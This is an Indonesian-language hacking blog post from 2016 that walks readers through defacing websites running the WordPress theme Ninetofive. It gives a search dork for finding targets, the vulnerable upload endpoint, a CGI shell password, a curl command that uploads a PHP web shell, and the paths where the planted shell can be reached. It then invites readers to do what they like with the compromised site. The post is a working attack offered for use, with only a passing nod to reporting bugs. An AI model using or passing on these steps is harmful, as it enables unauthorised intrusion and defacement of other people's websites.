Minggu, 29 Mei 2016

WordPress Theme Ninetofive Remote Exploit


Hello World; Pagi Fans, Please Say Hello Haters :*
yoeeh Gengs, Lanjut lagii Walking Blog :D , dah Lama nih gak Share Bug di Theme CMS WordPress. xixixhi, kali ini Nue akan Share Tutorial Deface dengan WordPress Theme Ninetofive Remote Exploit. iseng2 share eXploit lawas, kali aja masih crootz wkwkw.


Lanjut intip tutorialnya ;*


Bahan:
CGI Shell ( touch me senpai :'v ) | ( touche me Senpai :'D )

Dork:
inurl:/wp-content/themes/ninetofive
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

eXploit: /wp-content/themes/ninetofive/scripts/doajaxfileupload.php

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/wp-content/themes/ninetofive/scripts/doajaxfileupload.php

3. Vulnerability ~ {"error":"No files were uploaded."}

Kurang Lebih sih gini wkwkw
4. Setelah itu kita buka CGI Shell nya, tapi sebelumnya upload dulu CGI Shell nya ke web


Seterah Lu, mau Upload di shell bekasan lu, atau cpanel lu :p
5. Lalu klik CGI Shell ( liat di atas gambar )
6. Setelah di klik, masukin password nya, password nya adalah webr00t
Masukin password nya, Lalu Klik Enter
7. Jika sudah login, klik bacaan 'Upload File'



8. Lalu upload shell kalian
9. Setelah diupload, tinggal kita eksekusi :D masukin perintah berikut dan Tekan enter :D
curl -v -F "qqfile=@namashellkalian.php" "target.coli/wp-content/themes/ninetofive/scripts/doajaxfileupload.php

10. Jika berhasil akan seperti gambar dibawah ini :


Nanti akan muncul random shell
11. Set-Cookie: magnetAttached_1=uploads%2F74e2f7bf88287621d2949f9851blabla.php; expires=blabla (nama shell tergantung pas worknya sih, pokoknya sesuaikan aja sama yg tampil dilayar lu pas sukses jalanin commandnya ;* )

12. Akses Shell: 
target.coli/wp-content/uploads/tahun/bulan/shell.php
target.coli/wp-content/themes/ninetofive/scripts/uploads/shell.php
note: shell akses ada 2, cobaiin aja satu2 awkwakwka >.< , KALO BERHASIL YA NANTI MUNCUL SHELL LU DI WEB TARGET ;*


Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*


"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART

Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked ~
Sekian dan semoga bermanfaat .. terimakasih

Source and thanks toeitaro attacker



./Nuenomaru


Sukses adalah cara balas Dendam terbaik, utk orang2 yg memandang Lu Sebelah Mata







Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

0 komentar:

Posting Komentar

 

ande ande lumoet Template by Ipietoon Cute Blog Design